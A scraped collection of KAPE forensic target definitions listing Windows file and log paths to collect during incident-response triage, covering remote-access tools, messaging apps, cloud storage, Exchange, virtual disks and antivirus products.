av robert pascal 5 år siden
1393
Mer som dette
Description: VNC Logs
Author: Phill Moore
Version: 1.1
Id: b98dab2e-81f3-472e-a22a-05269ad16270
RecreateDirectories: true
Targets:
-
Name: RealVNC Log
Category: ApplicationLogs
Path: C:\Users\*\AppData\Local\RealVNC\vncserver.log
IsDirectory: false
Recursive: false
Comment: "https://www.realvnc.com/en/connect/docs/logging.html#logging"
-
Name: RealVNC Application Logs
Category: EventLogs
Path: ApplicationEvents.tkape
IsDirectory: false
Recursive: false
Comment: "Contains RealVNC entries, event source: VNC Server"
Description: 'TeraCopy log history'
Author: Kevin Pagano
Version: 1
Id: 111ee9ac-f8b3-4026-a3c9-90f76b6b2cb4
RecreateDirectories: true
Targets:
-
Name: TeraCopy
Category: TeraCopy
Path: C:\Users\*\AppData\Roaming\TeraCopy
IsDirectory: true
Recursive: true
Comment: ""
Description: Team Viewer Logs
Author: Hadar Yudovich
Version: 1.1
Id: 6f2cd531-1f4b-4f0b-aa96-2426621b0a14
RecreateDirectories: true
Targets:
-
Name: TeamViewer Connection Logs
Category: Communications
Path: C:\Program Files*\TeamViewer\connections*.txt
IsDirectory: false
Recursive: false
Comment: "Includes connections_incoming.txt and connections.txt"
-
Name: TeamViewer Application Logs
Category: ApplicationLogs
Path: C:\Program Files*\TeamViewer\TeamViewer*_Logfile*
IsDirectory: false
Recursive: false
Comment: "Includes TeamViewer<version>_Logfile.log and TeamViewer<version>_Logfile_OLD.log"
-
Name: TeamViewer Configuration Files
Category: ApplicationLogs
Path: C:\Users\*\AppData\Roaming\TeamViewer\MRU\RemoteSupport
IsDirectory: true
Recursive: true
Comment: "Includes miscellaneous config files"
Description: Skype
Author: Eric Zimmerman
Version: 3
Id: d7b0b49c-16bb-4b32-9f57-2d918acaebbc
RecreateDirectories: true
Targets:
-
Name: main.db (App <v12)
Category: Communications
Path: C:\Users\*\AppData\Local\Packages\Microsoft.SkypeApp_*\LocalState\*\main.db
IsDirectory: false
Recursive: false
Comment: ""
-
Name: skype.db (App +v12)
Category: Communications
Path: C:\Users\*\AppData\Local\Packages\Microsoft.SkypeApp_*\LocalState\*\skype.db
IsDirectory: false
Recursive: false
Comment: ""
-
Name: main.db XP
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Skype\*\main.db
IsDirectory: false
Recursive: false
Comment: ""
-
Name: main.db Win7+
Category: Communications
Path: C:\Users\*\AppData\Roaming\Skype\*\main.db
IsDirectory: false
Recursive: false
Comment: ""
-
Name: s4l-[username].db (App +v8)
Category: Communications
Path: C:\Users\*\AppData\Local\Packages\Microsoft.SkypeApp_*\LocalState\s4l-*.db
IsDirectory: false
Recursive: false
Comment: ""
-
Name: leveldb (Skype for Desktop +v8)
Category: Communications
Path: C:\Users\*\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\*.leveldb\*.log
IsDirectory: false
Recursive: false
Comment: ""
Description: ScreenConnect Data (now known as ConnectWise Control)
Author: Drew Ervin
Version: 1.0
Id: 26c80b79-b3c0-4378-abe8-a5a6c9aebb4f
RecreateDirectories: true
Targets:
-
Name: ScreenConnect Session Database
Category: ApplicationLogs
Path: C:\Program Files*\ScreenConnect\App_Data\Session.db
IsDirectory: false
Recursive: false
Comment: "SQLite database with session information"
-
Name: ScreenConnect Session Database
Category: ApplicationLogs
Path: C:\Program Files*\ScreenConnect\App_Data\User.xml
IsDirectory: false
Recursive: false
Comment: "Contains each user's last authenticated time"
-
Name: ScreenConnect Application Events
Category: EventLogs
Path: ApplicationEvents.tkape
IsDirectory: false
Recursive: false
Comment: "Contains ScreenConnect entries, source: ScreenConnect Client"
Description: Outlook PST and OST files
Author: Eric Zimmerman
Version: 1
Id: f91909c4-bba1-40d6-a3bc-39d060843a09
RecreateDirectories: true
Targets:
-
Name: PST XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Microsoft\Outlook\*.pst
IsDirectory: false
Recursive: false
Comment: ""
-
Name: OST XP
Category: Communications
Path: C:\Documents and Settings\*\Local Settings\Application Data\Microsoft\Outlook\*.ost
IsDirectory: false
Recursive: false
Comment: ""
-
Name: PST
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Outlook\*.pst
IsDirectory: false
Recursive: false
Comment: ""
-
Name: OST
Category: Communications
Path: C:\Users\*\AppData\Local\Microsoft\Outlook\*.ost
IsDirectory: false
Recursive: false
Comment: ""
Description: Notepad++ backup
Author: Banaanhangwagen
Version: 1
Id: dc6c1009-2d0a-4ead-99f0-d1f3a5380751
RecreateDirectories: true
Targets:
-
Name: Notepad++ backup
Category: Text Editor
Path: C:\Users\*\AppData\Roaming\Notepad++\backup
IsDirectory: True
Recursive: True
Comment: "Locates non-saved Notepad++ files and copies them."
Description: Microsoft OneDrive Storage Files and Metadata
Author: Chad Tilbury
Version: 1
Id: f3c680ca-0646-48cc-a471-5f484e22b1cf
RecreateDirectories: true
Targets:
-
Name: OneDrive User Files
Category: Apps
Path: C:\Users\*\OneDrive*\
IsDirectory: True
Recursive: True
FollowReparsePoint: True
FollowSymbolicLinks: True
Comment: "Caution -- This target will collect OneDrive contents from the local drive AND on-demand cloud files. Ensure your scope of authority permits cloud collections before use"
-
Name: OneDrive Metadata Logs
Category: Apps
Path: C:\Users\*\AppData\Local\Microsoft\OneDrive\logs\
IsDirectory: True
Recursive: True
Comment: ""
-
Name: OneDrive Metadata Settings
Category: Apps
Path: C:\Users\*\AppData\Local\Microsoft\OneDrive\settings\
IsDirectory: True
Recursive: True
Comment: ""
Description: LogMeIn Data
Author: Drew Ervin
Version: 1.0
Id: 488e9de2-ecb6-4b27-88a3-719715147c33
RecreateDirectories: true
Targets:
-
Name: LogMeIn ProgramData Logs
Category: ApplicationLogs
Path: C:\ProgramData\LogMeIn\Logs
IsDirectory: true
Recursive: true
Comment: ""
-
Name: LogMeIn Application Events
Category: EventLogs
Path: ApplicationEvents.tkape
IsDirectory: false
Recursive: false
Comment: "Contains LogMeIn entries, event source: LogMeIn"
-
Name: LogMeIn Application Logs
Category: ApplicationLogs
Path: C:\Users\*\AppData\Local\temp\LogMeInLogs
IsDirectory: true
Recursive: true
Comment: "Contains RemoteAssist (formerly GoToAssist), GoToMeeting, and other GoTo* logs"
Description: Kaseya Data
Author: Drew Ervin
Version: 1.0
Id: bb83f860-5a10-4471-821e-9ef4ab6f856c
RecreateDirectories: true
Targets:
-
Name: Kaseya Live Connect Logs (XP)
Category: ApplicationLogs
Path: C:\Documents and Settings\*\Application Data\Kaseya\Log
IsDirectory: true
Recursive: true
Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229009708-Live-Connect-Log-File-Locations"
-
Name: Kaseya Live Connect Logs
Category: ApplicationLogs
Path: C:\Users\*\AppData\Local\Kaseya\Log\KaseyaLiveConnect
IsDirectory: true
Recursive: true
Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229009708-Live-Connect-Log-File-Locations"
-
Name: Kaseya Agent Endpoint Service Logs (XP)
Category: ApplicationLogs
Path: C:\Documents and Settings\All Users\Application Data\Kaseya\Log\Endpoint
IsDirectory: true
Recursive: true
Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229009708-Live-Connect-Log-File-Locations"
-
Name: Kaseya Agent Endpoint Service Logs
Category: ApplicationLogs
Path: C:\ProgramData\Kaseya\Log\Endpoint
IsDirectory: true
Recursive: true
Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229009708-Live-Connect-Log-File-Locations"
-
Name: Kaseya Agent Service Log
Category: ApplicationLogs
Path: C:\Program Files*\Kaseya\*\agentmon.log*
IsDirectory: false
Recursive: false
Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229009708-Live-Connect-Log-File-Locations"
-
Name: Kaseya Setup Log
Category: ApplicationLogs
Path: C:\Users\*\AppData\Local\Temp\KASetup.log
IsDirectory: false
Recursive: false
Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229011448"
-
Name: Kaseya Setup Log
Category: ApplicationLogs
Path: C:\Windows*\Temp\KASetup.log
IsDirectory: false
Recursive: false
Comment: "https://helpdesk.kaseya.com/hc/en-gb/articles/229011448"
Description: Java WebStart Cache - (IDX Files)
Author: piesecurity
Version: 1
Id: 4dc2e35c-fc20-45f6-89a6-5d729596c522
RecreateDirectories: true
Targets:
-
Name: Java WebStart Cache User Level - Default
Category: Communication
Path: C:\Users\*\AppData\Local\Sun\Java\Deployment\cache\*\*\*.idx
IsDirectory: false
Recursive: false
-
Name: Java WebStart Cache User Level - IE Protected Mode
Category: Communication
Path: C:\Users\*\AppData\LocalLow\Sun\Java\Deployment\cache\*\*\*.idx
IsDirectory: false
Recursive: false
-
Name: Java WebStart Cache System level
Category: Communication
Path: C:\Windows*\System32\config\systemprofile\AppData\Local\Sun\Java\Deployment\cache\*\*\*.idx
IsDirectory: false
Recursive: false
-
Name: Java WebStart Cache System level - IE Protected Mode
Category: Communication
Path: C:\Windows*\System32\config\systemprofile\AppData\LocalLow\Sun\Java\Deployment\cache\*\*\*.idx
IsDirectory: false
Recursive: false
-
Name: Java WebStart Cache System level (SysWow64)
Category: Communication
Path: C:\Windows*\SysWOW64\config\systemprofile\AppData\Local\Sun\Java\Deployment\cache\*\*\*.idx
IsDirectory: false
Recursive: false
-
Name: Java WebStart Cache System level (SysWow64) - IE Protected Mode
Category: Communication
Path: C:\Windows*\SysWOW64\config\systemprofile\AppData\LocalLow\Sun\Java\Deployment\cache\*\*\*.idx
IsDirectory: false
Recursive: false
-
Name: Java WebStart Cache User Level - XP
Category: Communications
Path: C:\Documents and Settings\*\Application Data\Sun\Java\Deployment\cache\*\*\*.idx
IsDirectory: false
Recursive: false
Description: Jabber
Author: Andrew Bannon
Version: 1.0
Id: 69249cc7-2b04-47c4-8ba9-d8055fadc950
RecreateDirectories: true
Targets:
-
Name: Cisco Jabber Database
Category: Communications
Path: C:\Users\*\AppData\Local\Cisco\Unified Communications\Jabber\CSF\History\*.db
IsDirectory: false
Recursive: false
Comment: "The Cisco Jabber process needs to be killed before database can be copied."
Description: iTunes Backups
Author: Tony Knutson
Version: 2
Id: 7b4a98d9-b36a-40be-bacc-ad0102b0a8c3
RecreateDirectories: true
Targets:
-
Name: iTunes Backup Folder
Category: Communications
Path: C:\Users\*\AppData\Roaming\Apple\Mobilesync\Backup
IsDirectory: True
Recursive: True
Comment: ""
-
Name: iTunes Backup Folder
Category: Communications
Path: C:\Users\*\AppData\Roaming\Apple Computer\Mobilesync\Backup
IsDirectory: True
Recursive: True
Comment: ""
-
Name: iTunes Backup Folder - iOS13
Category: Communications
Path: C:\Users\*\Apple\Mobilesync\Backup
Description: Google Drive Storage Files and Metadata
Author: Chad Tilbury
Version: 1
Id: 34f115e0-687e-49c1-acdd-85cc68a86157
RecreateDirectories: true
Targets:
-
Name: Google Drive User Files
Category: Apps
Path: C:\Users\*\Google Drive*\
IsDirectory: True
Recursive: True
Comment: "Google Drive Backup and Sync Application"
-
Name: Google Drive Metadata
Category: Apps
Path: C:\Users\*\AppData\Local\Google\Drive\
IsDirectory: True
Recursive: True
Comment: "Google Drive Backup and Sync Application"
-
Name: Google File Stream Metadata
Category: Apps
Path: C:\Users\*\AppData\Local\Google\DriveFS\
IsDirectory: True
Recursive: True
Comment: "Google Drive File Stream Application"
Description: FileZilla XML and SQLite Log Files
Author: Dennis Reneau
Version: 1
Id: f7eaa0d5-0b15-4578-b411-ac4226e13a7f
RecreateDirectories: true
Targets:
-
Name: FileZilla XML Log Files
Category: Logs
Path: C:\Users\*\AppData\Roaming\FileZilla\*.xml*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: FileZilla SQLite3 Log Files
Category: Logs
Path: C:\Users\*\AppData\Roaming\FileZilla\*.sqlite3*
IsDirectory: false
Recursive: false
Comment: ""
Description: Exchange Transport Log Files
Author: Keith Twombley
Version: 1
Id: 9bc0a453-50ab-46e8-a424-09dc7022c4a4
RecreateDirectories: true
Targets:
-
Name: Exchange TransportRoles log files
Category: Logs
Path: C:\Program Files\Microsoft\Exchange Server\*\TransportRoles\Logs\
IsDirectory: true
Recursive: true
FileMask: '*.log'
Comment: "Highly dependent on Exchange configuration"
Description: Exchange Log Files
Author: Keith Twombley
Version: 1
Id: 1b54aafe-5074-4d45-b129-29107ce7f863
RecreateDirectories: true
Targets:
-
Name: Exchange client access log files
Category: Logs
Path: ExchangeClientAccess.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Exchange TransportRoles log files
Category: Logs
Path: ExchangeTransport.tkape
IsDirectory: false
Recursive: false
Comment: ""
Description: Exchange Client Access Log Files
Author: Keith Twombley
Version: 1
Id: 9e802154-53eb-4cc9-9cca-d2e39f3227d7
RecreateDirectories: true
Targets:
-
Name: Exchange client access log files
Category: Logs
Path: C:\Program Files\Microsoft\Exchange Server\*\Logging
IsDirectory: true
Recursive: true
FileMask: '*.log'
Comment: "Highly dependent on Exchange configuration"
Description: Dropbox Cloud Storage Files and Metadata
Author: Chad Tilbury
Version: 1
Id: e8501b5d-2cfc-4693-923d-52edd2ddf3bc
RecreateDirectories: true
Targets:
-
Name: Dropbox User Files
Category: Apps
Path: C:\Users\*\Dropbox*\
IsDirectory: True
Recursive: True
Comment: ""
-
Name: Dropbox Metadata
Category: Apps
Path: C:\Users\*\AppData\Local\Dropbox\info.json
IsDirectory: False
Recursive: False
Comment: "Getting individual files because folder may contain very large extraneous files"
-
Name: Dropbox Metadata
Category: Apps
Path: C:\Users\*\AppData\Local\Dropbox\*\filecache.dbx
IsDirectory: False
Recursive: False
Comment: "Getting individual files because folder may contain very large extraneous files"
-
Name: Dropbox Metadata
Category: Apps
Path: C:\Users\*\AppData\Local\Dropbox\*\config.dbx
IsDirectory: False
Recursive: False
Comment: "Getting individual files because folder may contain very large extraneous files"
-
Name: Windows Protect Folder
Category: FileSystem
Path: C:\Users\*\AppData\Roaming\Microsoft\Protect\*\
IsDirectory: True
Recursive: True
Comment: "Required for offline decryption of Dropbox databases"
Description: Discord cache files
Author: Christian Johansen
Version: 1
Id: 5a44a0ef-db56-4103-8748-797432487028
RecreateDirectories: true
Targets:
-
Name: Discord cache files
Category: Communications
Path: C:\Users\*\AppData\Roaming\discord\cache
IsDirectory: true
Recursive: true
Comment: "Gets cached data from Discord app"
Description: Confluence Log Files
Author: Eric Capuano
Version: 1
Id: 317b3814-b383-4bcf-97a2-3b3d1c5f8ca0
RecreateDirectories: true
Targets:
-
Name: Confluence Wiki Log Files
Category: Logs
Path: C:\Atlassian\Application Data\Confluence\logs\*.log*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Confluence Wiki Log Files
Category: Logs
Path: C:\Program Files\Atlassian\Confluence\logs\*.log
IsDirectory: false
Recursive: false
Comment: ""
Description: Cloud Storage Contents and Metadata
Author: Chad Tilbury
Version: 1
Id: 29984028-0f42-4922-8a3f-752341f5852c
RecreateDirectories: true
Targets:
-
Name: OneDrive
Category: Apps
Path: OneDrive.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Google Drive
Category: Apps
Path: GoogleDrive.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Dropbox
Category: Apps
Path: Dropbox.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Box
Category: Apps
Path: BoxDrive.tkape
IsDirectory: false
Recursive: false
Comment: ""
Description: Box Cloud Storage Files and Metadata
Author: Chad Tilbury
Version: 1
Id: 2e3bee53-24b6-4867-8510-7da07d353abc
RecreateDirectories: true
Targets:
-
Name: Box User Files
Category: Apps
Path: C:\Users\*\Box*\
IsDirectory: True
Recursive: True
FollowReparsePoint: True
FollowSymbolicLinks: True
Comment: "Caution -- This target will collect Box Drive contents from the local drive AND on-demand cloud files. Ensure your scope of authority permits cloud collections before use"
-
Name: Box Drive Application Metadata
Category: Apps
Path: C:\Users\*\AppData\Local\Box\Box\*\
IsDirectory: True
Recursive: True
Comment: ""
-
Name: Box Sync Application Metadata
Category: Apps
Path: C:\Users\*\AppData\Local\Box Sync\*\
IsDirectory: True
Recursive: True
Comment: ""
Description: Aspera Connect Log Files
Author: Dennis Reneau
Version: 1.0
Id: 1f311765-a5c0-496a-a5d5-e79cbd0702e2
RecreateDirectories: true
Targets:
-
Name: Aspera Client Logs
Category: FileDownload
Path: C:\Users\*\AppData\Local\Aspera\Aspera Connect\var\log\
FileMask: '*.log'
IsDirectory: true
Recursive: true
Comment: "Locates Aspera Connect .log files and copies them"
-
Name: Aspera Server Logs
Category: FileDownload
Path: C:\Users\*\.aspera\connect\var\log\
FileMask: '*.log'
IsDirectory: true
Recursive: true
Comment: "Locates Aspera Connect .log files and copies them"
Description: Ammyy Data
Author: Drew Ervin
Version: 1.0
Id: 606ad937-c32e-49ba-9403-3f1ce501a012
RecreateDirectories: true
Targets:
-
Name: Ammyy Program Data
Category: ApplicationLogs
Path: C:\ProgramData\Ammyy
IsDirectory: true
Recursive: true
Comment: "May not contain traditional log files, but presence of this folder may indicate historical usage"
Description: Virtual Disks
Author: Phill Moore
Version: 1
Id: 283fd2b7-b914-4683-85b4-40dd3fefecbb
RecreateDirectories: true
Targets:
-
Name: VHD
Category: Disk Images
Path: C:\
FileMask: '*.VHD'
IsDirectory: true
Recursive: true
Comment: "VHD"
-
Name: VHDX
Category: Disk Images
Path: C:\
FileMask: '*.VHDX'
IsDirectory: true
Recursive: true
Comment: "VHDX"
-
Name: VDI
Category: Disk Images
Path: C:\
FileMask: '*.VDI'
IsDirectory: true
Recursive: true
Comment: "VDI"
-
Name: VMDK
Category: Disk Images
Path: C:\
FileMask: '*.VMDK'
IsDirectory: true
Recursive: true
Comment: "VMDK"
Description: MFT, Registry and Event Logs to generate a mini timeline
Author: Mari DeGrazia
Version: 1
Id: 02e131d6-7784-4302-9495-75536423e414
RecreateDirectories: true
Targets:
-
Name: Event Logs
Category: Event Logs
Path: EventLogs.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: File System
Category: File System
Path: FileSystem.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: RegistryHives
Category: Registry
Path: RegistryHives.tkape
IsDirectory: false
Recursive: false
Comment: ""
Description: Kape Triage collections that will collect most of the files needed for a DFIR Investigation. This module pulls evidence from File System files, Registry Hives, Event Logs, Scheduled Tasks, Evidence of Execution, SRUM data, Web Browser data (IE/Edge, Chrome, Mozilla history), LNK Files, Jump Lists, 3rd party remote access software logs, 3rd party antivirus software logs.
Author: Scott Downie
Version: 2.0
Id: a745b730-d6b7-4cb7-9847-4e896d9f3c52
RecreateDirectories: true
Targets:
-
Name: FileSystem
Category: Targets
Path: FileSystem.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: RegistryHives
Category: Targets
Path: RegistryHives.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: EventLogs
Category: Targets
Path: EventLogs.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ScheduledTasks
Category: Targets
Path: ScheduledTasks.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: EvidenceOfExecution
Category: Targets
Path: EvidenceOfExecution.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SRUM
Category: Targets
Path: SRUM.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: WebBrowsers
Category: Targets
Path: WebBrowsers.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: LnkFilesAndJumpLists
Category: Targets
Path: LnkFilesAndJumpLists.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: RemoteAccess
Category: Targets
Path: RemoteAdmin.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: AntiVirus
Category: Targets
Path: Antivirus.tkape
IsDirectory: false
Recursive: false
Comment: ""
Description: Composite target for files related to remote administration tools
Author: Drew Ervin
Version: 1.2
Id: 31cf5a4e-c44c-4457-b11f-74dca73e141b
RecreateDirectories: true
Targets:
-
Name: RDP Logs
Category: EventLogs
Path: RDPLogs.tkape
IsDirectory: false
Recursive: false
Comment: "Contains Windows Event Logs related to RDP"
-
Name: RDP Cache
Category: ApplicationData
Path: RDPCache.tkape
IsDirectory: false
Recursive: false
Comment: "Contains data cached during recent RDP sessions"
-
Name: LogMeIn
Category: ApplicationLogs
Path: LogMeIn.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: VNC
Category: ApplicationLogs
Path: VNCLogs.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Chrome Remote Desktop
Category: ApplicationLogs
Path: ApplicationEvents.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: TeamViewer
Category: ApplicationLogs
Path: TeamViewerLogs.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Ammyy
Category: Ammyy.tkape
Path: ApplicationLogs
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Kaseya
Category: ApplicationLogs
Path: Kaseya.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ScreenConnect (ConnectWise Control)
Category: ApplicationLogs
Path: ScreenConnect.tkape
IsDirectory: false
Recursive: false
Comment: ""
Description: Windows Defender Data
Author: Drew Ervin
Version: 1.0
Id: 061aa929-292b-4d7f-a4af-a3fe2673a3e5
RecreateDirectories: true
Targets:
-
Name: Windows Defender Logs
Category: Antivirus
Path: C:\ProgramData\Microsoft\Microsoft AntiMalware\Support\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Windows Defender Event Logs
Category: EventLogs
Path: C:\Windows*\System32\winevt\Logs\Microsoft-Windows-WindowsDefender*.evtx
IsDirectory: false
Recursive: false
Comment: ""
Description: Webroot Antivirus
Author: Drew Ervin
Version: 1.0
Id: c53c2b4e-075b-4162-b93e-aaf8c968e0b0
RecreateDirectories: true
Targets:
-
Name: Webroot Program Data
Category: Antivirus
Path: C:\ProgramData\WRData\WRLog.log
IsDirectory: false
Recursive: false
Comment: ""
Description: VIPRE Data
Author: Drew Ervin
Version: 1.0
Id: 8af4ffd8-264e-4c7d-aa28-8cc4f543b01d
RecreateDirectories: true
Targets:
-
Name: VIPRE Business Agent Logs
Category: Antivirus
Path: C:\ProgramData\VIPRE Business Agent\Logs\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: VIPRE Business User Logs (v7+)
Category: Antivirus
Path: C:\Users\*\AppData\Roaming\VIPRE Business\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: VIPRE Business User Logs (v5-v6)
Category: Antivirus
Path: C:\Users\*\AppData\Roaming\GFI Software\AntiMalware\Logs\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: VIPRE Business User Logs (up to v4)
Category: Antivirus
Path: C:\Users\*\AppData\Roaming\Sunbelt Software\AntiMalware\Logs\
IsDirectory: true
Recursive: true
Comment: ""
Description: Trend Micro Data
Author: Drew Ervin
Version: 1.0
Id: 73f8ccea-61cf-4993-aa26-e5cad4f8cc8f
RecreateDirectories: true
Targets:
-
Name: Trend Micro Logs
Category: Antivirus
Path: C:\ProgramData\Trend Micro\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Trend Micro Security Agent Report Logs
Category: Antivirus
Path: C:\Program Files*\Trend Micro\Security Agent\Report\*.log
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Trend Micro Security Agent Connection Logs
Category: Antivirus
Path: C:\Program Files*\Trend Micro\Security Agent\ConnLog\*.log
IsDirectory: false
Recursive: false
Comment: ""
Description: Symantec AV Logs
Author: Brian Maloney
Version: 1.2
Id: 5e750ea2-f6dc-4981-88d1-636ce042aa0d
RecreateDirectories: true
Targets:
-
Name: Symantec Endpoint Protection Logs (XP)
Category: AntiVirus
Path: C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs\AV
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Symantec Endpoint Protection Logs
Category: AntiVirus
Path: C:\ProgramData\Symantec\Symantec Endpoint Protection\*\Data\Logs\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Symantec Endpoint Protection User Logs
Category: AntiVirus
Path: C:\Users\*\AppData\Local\Symantec\Symantec Endpoint Protection\Logs
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Symantec Event Log Win7+
Category: EventLogs
Path: C:\Windows*\system32\winevt\logs\Symantec Endpoint Protection Client.evtx
IsDirectory: false
Recursive: false
Comment: "Symantec specific Windows event log"
-
Name: Symantec Endpoint Protection Manager (SEPM) Application Events
Category: EventLogs
Path: ApplicationEvents.tkape
IsDirectory: false
Recursive: false
Comment: "Contains SEPM entries, documented here: https://support.symantec.com/us/en/article.tech196455.html"
-
Name: Symantec Endpoint Protection Quarantine (XP)
Category: AntiVirus
Path: C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Symantec Endpoint Protection Quarantine
Category: AntiVirus
Path: C:\ProgramData\Symantec\Symantec Endpoint Protection\*\Data\Quarantine
IsDirectory: true
Recursive: true
Comment: ""
Description: SUPERAntiSpyware Data
Author: Drew Ervin
Version: 1.0
Id: 0b2c9e30-8d85-43ea-aa26-b20503b8e1da
RecreateDirectories: true
Targets:
-
Name: SUPERAntiSpyware Logs
Category: Antivirus
Path: C:\Users\*\AppData\Roaming\SUPERAntiSpyware\Logs\
IsDirectory: true
Recursive: true
Comment: ""
Description: Sophos Data
Author: Drew Ervin
Version: 1.0
Id: a50e5204-878e-4b5d-82fb-e6148d976bf7
RecreateDirectories: true
Targets:
-
Name: Sophos Logs (XP)
Category: Antivirus
Path: C:\Documents and Settings\All Users\Application Data\Sophos\Sophos *\Logs\
IsDirectory: true
Recursive: true
Comment: "Includes Anti-Virus, Client Firewall, Data Control, Device Control, Endpoint Defense, Network Threat Detection, Management Communications System, Patch Control, Tamper Protection"
-
Name: Sophos Logs
Category: Antivirus
Path: C:\ProgramData\Sophos\Sophos *\Logs\
IsDirectory: true
Recursive: true
Comment: "Includes Anti-Virus, Client Firewall, Data Control, Device Control, Endpoint Defense, Network Threat Detection, Management Communications System, Patch Control, Tamper Protection"
-
Name: Sophos Application Events
Category: Antivirus
Path: ApplicationEvents.tkape
IsDirectory: false
Recursive: false
Comment: "Event source: Sophos Anti-Virus"
Description: RogueKiller Anti-Malware (by Adlice Software)
Author: Drew Ervin
Version: 1.0
Id: 089b2afb-cc29-4565-9c2f-cbf0ba50f10d
RecreateDirectories: true
Targets:
-
Name: RogueKiller Reports
Category: Antivirus
Path: C:\ProgramData\RogueKiller\logs\AdliceReport_*.json
IsDirectory: false
Recursive: false
Comment: ""
Description: McAfee Log Files
Author: Sam Smoker
Version: 1.1
Id: d2df019b-35d0-4f7b-8132-7500cbd39901
RecreateDirectories: True
Targets:
-
Name: McAfee Desktop Protection Logs XP
Category: AntiVirus
Path: C:\Users\All Users\Application Data\McAfee\DesktopProtection
IsDirectory: true
Recursive: true
-
Name: McAfee Desktop Protection Logs
Category: AntiVirus
Path: C:\ProgramData\McAfee\DesktopProtection
IsDirectory: true
Recursive: true
-
Name: McAfee Endpoint Security Logs
Category: AntiVirus
Path: C:\ProgramData\McAfee\Endpoint Security\Logs\
IsDirectory: true
Recursive: true
-
Name: McAfee Endpoint Security Logs
Category: AntiVirus
Path: C:\ProgramData\McAfee\Endpoint Security\Logs_Old\
IsDirectory: true
Recursive: true
-
Name: McAfee VirusScan Logs
Category: AntiVirus
Path: C:\ProgramData\Mcafee\VirusScan\
IsDirectory: true
Recursive: true
Description: McAfee ePO Log Files
Author: Doug Metz
Version: 1
Id: 8e893785-6bf2-4990-a783-35b0f5e1b442
RecreateDirectories: True
Targets:
-
Name: McAfee ePO Logs
Category: AntiVirus
Path: C:\ProgramData\McAfee\Endpoint Security\Logs
IsDirectory: true
Recursive: true
Description: Malwarebytes Data
Author: Drew Ervin
Version: 1.0
Id: 3509c461-f6ef-499f-87e0-27bb30633259
RecreateDirectories: true
Targets:
-
Name: MalwareBytes Anti-Malware Logs
Category: Antivirus
Path: C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\Logs\mbam-log-*.xml
IsDirectory: false
Recursive: false
Comment: ""
-
Name: MalwareBytes Anti-Malware Service Logs
Category: Antivirus
Path: C:\ProgramData\Malwarebytes\MBAMService\logs\mbamservice.log
IsDirectory: false
Recursive: false
Comment: ""
-
Name: MalwareBytes Anti-Malware Scan Logs
Category: Antivirus
Path: C:\Users\*\AppData\Roaming\Malwarebytes\Malwarebytes Anti-Malware\Logs
IsDirectory: true
Recursive: true
Comment: ""
Description: HitmanPro Antivirus Data
Author: Drew Ervin
Version: 1.0
Id: db98e01b-bd07-4b40-a6ef-e75bdef39bb2
RecreateDirectories: true
Targets:
-
Name: HitmanPro Logs
Category: Antivirus
Path: C:\ProgramData\HitmanPro\Logs
IsDirectory: true
Recursive: true
Comment: ""
-
Name: HitmanPro Alert Logs
Category: Antivirus
Path: C:\ProgramData\HitmanPro.Alert\Logs
IsDirectory: true
Recursive: true
Comment: ""
-
Name: HitmanPro Database
Category: Antivirus
Path: C:\ProgramData\HitmanPro.Alert\excalibur.db
IsDirectory: false
Recursive: false
Comment: "SQl Lite DB"
Description: F-Secure Antivirus Data
Author: Drew Ervin
Version: 1.0
Id: 8bfd6f82-f867-4ce2-89ac-22802ff9a15f
RecreateDirectories: true
Targets:
-
Name: F-Secure Logs
Category: Antivirus
Path: C:\ProgramData\F-Secure\Log\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: F-Secure User Logs
Category: Antivirus
Path: C:\Users\*\AppData\Local\F-Secure\Log\
IsDirectory: true
Recursive: true
Comment: ""
-
Name: F-Secure Scheduled Scan Reports
Category: Antivirus
Path: C:\ProgramData\F-Secure\Antivirus\ScheduledScanReports\
IsDirectory: true
Recursive: true
Comment: ""
Description: ESET Antivirus Data
Author: Drew Ervin
Version: 1.0
